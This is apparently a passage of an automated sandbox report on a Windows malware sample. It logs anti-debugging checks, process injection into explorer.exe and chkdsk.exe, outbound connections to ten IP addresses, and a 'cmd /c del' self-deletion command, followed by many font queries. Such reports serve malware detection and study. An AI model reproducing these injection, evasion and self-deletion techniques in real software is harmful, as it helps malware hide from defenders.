          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148CA72 mov eax, dword ptr fs:[00000030h]2_2_0148CA72
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149CA11 mov eax, dword ptr fs:[00000030h]2_2_0149CA11
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144CA24 mov eax, dword ptr fs:[00000030h]2_2_0144CA24
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143EA2E mov eax, dword ptr fs:[00000030h]2_2_0143EA2E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01434A35 mov eax, dword ptr fs:[00000030h]2_2_01434A35
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01434A35 mov eax, dword ptr fs:[00000030h]2_2_01434A35
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01466ACC mov eax, dword ptr fs:[00000030h]2_2_01466ACC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01466ACC mov eax, dword ptr fs:[00000030h]2_2_01466ACC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01466ACC mov eax, dword ptr fs:[00000030h]2_2_01466ACC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410AD0 mov eax, dword ptr fs:[00000030h]2_2_01410AD0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01444AD0 mov eax, dword ptr fs:[00000030h]2_2_01444AD0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01444AD0 mov eax, dword ptr fs:[00000030h]2_2_01444AD0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144AAEE mov eax, dword ptr fs:[00000030h]2_2_0144AAEE
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144AAEE mov eax, dword ptr fs:[00000030h]2_2_0144AAEE
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]2_2_0141EA80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]2_2_0141EA80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]2_2_0141EA80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]2_2_0141EA80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141EA80 mov eax, dword ptr fs:[00000030h]2_2_0141EA80
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\881SP1exr1.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 34.68.234.4 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.205.127.201 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.86.64.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.64.97.60 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.120.80.111 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 167.172.228.26 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.34.228.191 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 13.32.208.72 80Jump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 330000Jump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeMemory written: C:\Users\user\Desktop\881SP1exr1.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\881SP1exr1.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000002.4092282254.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1646217876.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4088992932.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1646217876.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4089436862.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1646217876.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Users\user\Desktop\881SP1exr1.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
